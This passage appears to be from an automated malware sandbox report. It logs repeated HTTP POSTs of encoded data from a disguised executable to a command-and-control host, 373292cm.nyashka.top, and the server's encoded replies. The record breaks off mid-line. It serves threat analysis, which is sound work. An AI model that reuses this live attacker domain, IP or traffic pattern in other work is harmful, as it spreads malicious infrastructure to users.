                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:25.566421986 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:25.764579058 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    49 | 192.168.2.8 | 49762 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:25.888072968 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    50 | 192.168.2.8 | 49763 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:26.347616911 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1836
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:27.015506029 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:27.215221882 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    51 | 192.168.2.8 | 49764 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:26.467586994 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:27.131504059 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:27.266408920 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    52 | 192.168.2.8 | 49765 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:27.390300035 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:28.063322067 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:28.191332102 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    53 | 192.168.2.8 | 49766 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:28.311752081 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:28.985268116 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:29.119193077 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    54 | 192.168.2.8 | 49767 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:29.247684002 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:29.919277906 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:30.046088934 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    55 | 192.168.2.8 | 49768 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:30.170511007 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:30.837630033 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:31.035548925 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:30 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    56 | 192.168.2.8 | 49769 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:31.159673929 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:31.823472977 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:32.063152075 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    57 | 192.168.2.8 | 49770 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:32.470247030 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    58 | 192.168.2.8 | 49771 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:32.493345022 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:33.163810968 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:33.298940897 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    59 | 192.168.2.8 | 49772 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:33.418369055 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:33.777101040 CEST2544OUTData Raw: 5f 53 5c 57 54 40 54 5b 5b 5f 5a 51 59 54 58 53 57 5c 5d 53 57 5e 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\WT@T[[_ZQYTXSW\]SW^SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-;#8!4 1Z==X<[?=$ Z ! P()##!X;>&F$.Y/)
                                    Aug 25, 2024 15:46:34.093650103 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:34.226552010 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    60 | 192.168.2.8 | 49773 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:34.356082916 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:34.775562048 CEST2544OUTData Raw: 5a 56 59 53 51 44 54 58 5b 5f 5a 51 59 52 58 5f 57 5a 5d 53 57 5c 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZVYSQDTX[_ZQYRX_WZ]SW\SXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q./U;D6>$_ 06)=+(>.<=+ 042#<9"35;.&F$.Y/1
                                    Aug 25, 2024 15:46:35.060540915 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:35.194092989 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    61 | 192.168.2.8 | 49774 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:35.326463938 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:35.683312893 CEST2544OUTData Raw: 5a 52 5c 51 54 49 54 59 5b 5f 5a 51 59 50 58 57 57 5d 5d 5b 57 51 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZR\QTITY[_ZQYPXWW]][WQS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q./,#- 5\*0?*+' <?#1(**'#1_8&F$.Y/
                                    Aug 25, 2024 15:46:36.029711962 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:36.231978893 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    62 | 192.168.2.8 | 49775 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:36.354325056 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:36.704216003 CEST2544OUTData Raw: 5f 50 59 57 51 45 54 59 5b 5f 5a 51 59 55 58 5f 57 5d 5d 58 57 5d 53 54 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _PYWQETY[_ZQYUX_W]]XW]STYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/'6.8^#0\)<\?%(;X <7W#W8S(#\;&F$.Y/-
                                    Aug 25, 2024 15:46:37.019953012 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:37.150091887 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:36 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    63 | 192.168.2.8 | 49776 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:37.277791023 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    64 | 192.168.2.8 | 49777 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:37.644320965 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:37.995929003 CEST1840OUTData Raw: 5f 54 5c 57 51 40 54 59 5b 5f 5a 51 59 5e 58 57 57 50 5d 5d 57 5f 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _T\WQ@TY[_ZQY^XWWP]]W_S]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.83$6?#1])>0\?.5+-",#!1/+9_ 0,&F$.Y/
                                    Aug 25, 2024 15:46:38.317540884 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:38.451833963 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 57 29 1b 22 5d 32 2b 20 19 30 23 32 1f 29 03 2f 5a 29 04 29 1a 25 28 2d 5f 26 2d 2c 50 30 3b 21 1f 2b 07 26 50 32 59 20 02 2e 0e 2b 5d 0c 13 22 1b 37 04 2a 10 25 02 28 5c 3e 2b 2c 05 21 2c 2d 03 28 2a 07 19 3e 3c 2f 01 2b 39 0a 03 28 04 2a 53 38 06 2d 5a 39 0e 00 51 34 14 2b 52 0d 11 27 0c 2b 3e 21 1e 2a 07 27 59 22 06 33 5b 27 03 2a 1c 24 22 26 53 30 5f 38 10 25 54 21 54 24 21 2d 1c 26 15 0f 03 26 2f 35 1f 21 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &W)"]2+ 0#2)/Z))%(-_&-,P0;!+&P2Y .+]"7*%(\>+,!,-(*></+9(*S8-Z9Q4+R'+>!*'Y"3['*$"&S0_8%T!T$!-&&/5!"#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    65 | 192.168.2.8 | 49778 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:37.766120911 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:38.120832920 CEST2544OUTData Raw: 5a 52 5c 51 51 43 54 5d 5b 5f 5a 51 59 51 58 55 57 5b 5d 53 57 5a 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZR\QQCT][_ZQYQXUW[]SWZS_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.,3C" Y4)>3++>(7<71?()?Y" /&F$.Y/=
                                    Aug 25, 2024 15:46:38.439027071 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:38.638863087 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    66 | 192.168.2.8 | 49779 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:38.776668072 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:39.121088028 CEST2544OUTData Raw: 5a 51 5c 57 54 40 54 5e 5b 5f 5a 51 59 51 58 5f 57 5a 5d 5a 57 59 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\WT@T^[_ZQYQX_WZ]ZWYS_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,#"= 4%)>7?-=_+; 441'()# #)\8&F$.Y/=
                                    Aug 25, 2024 15:46:39.481192112 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:39.681713104 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    67 | 192.168.2.8 | 49780 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:39.821790934 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2532
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:40.168323040 CEST2532OUTData Raw: 5f 53 5c 55 54 46 54 59 5b 5f 5a 51 59 57 58 57 57 5a 5d 52 57 51 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
